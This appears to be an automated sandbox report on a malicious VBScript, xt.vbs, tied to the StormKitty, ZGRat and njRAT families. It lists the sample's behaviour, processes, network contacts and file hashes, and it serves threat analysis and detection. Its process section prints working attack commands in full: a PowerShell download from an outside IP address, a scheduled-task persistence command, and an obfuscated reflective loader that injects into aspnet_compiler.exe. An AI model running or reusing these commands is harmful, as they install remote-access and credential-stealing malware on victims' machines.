Analysis Overview
SHA256
45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
Threat Level: Known bad
The file xt.vbs was found to be: Known bad.
Malicious Activity Summary
StormKitty
ZGRat
StormKitty payload
njRAT/Bladabindi
Detect ZGRat V1
Downloads MZ/PE file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-20 19:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-20 19:06
Reported
2024-03-20 19:14
Platform
win7-20240221-en
Max time kernel
361s
Max time network
362s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 2784 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 2784 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 2784 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
Network
Files
memory/2784-5-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp
memory/2784-4-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2784-6-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/2784-7-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2784-8-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp
memory/2784-9-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2784-10-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2784-11-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2784-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-20 19:06
Reported
2024-03-20 19:18
Platform
win10v2004-20240226-en
Max time kernel
600s
Max time network
594s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
njRAT/Bladabindi
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5008 set thread context of 2572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 3556 set thread context of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 1452 set thread context of 2320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 4984 set thread context of 4092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\get.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\get.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| PL | 45.80.158.168:222 | 45.80.158.168 | tcp |
| US | 8.8.8.8:53 | 168.158.80.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.23.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.23.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | torrentmoviess.com | udp |
| TR | 78.161.57.95:5552 | torrentmoviess.com | tcp |
| TR | 78.161.57.95:5552 | torrentmoviess.com | tcp |
| US | 8.8.8.8:53 | windows11.loseyourip.com | udp |
| NL | 91.92.252.68:1177 | windows11.loseyourip.com | tcp |
| US | 8.8.8.8:53 | 68.252.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.50.20.in-addr.arpa | udp |
Files
memory/2388-5-0x0000015D511B0000-0x0000015D511D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2388-10-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/2388-11-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-12-0x0000015D512E0000-0x0000015D51306000-memory.dmp
memory/2388-13-0x0000015D51310000-0x0000015D51324000-memory.dmp
memory/2388-14-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/2388-15-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-16-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-17-0x0000015D51370000-0x0000015D51382000-memory.dmp
memory/2388-18-0x0000015D50870000-0x0000015D5087A000-memory.dmp
C:\Users\Public\node_modules\async\reduce.js
| MD5 | 724bb52915e1158b4dff6f26ef4baf72 |
| SHA1 | ad0aa6a0ac5576433051167524923e6aa794c96a |
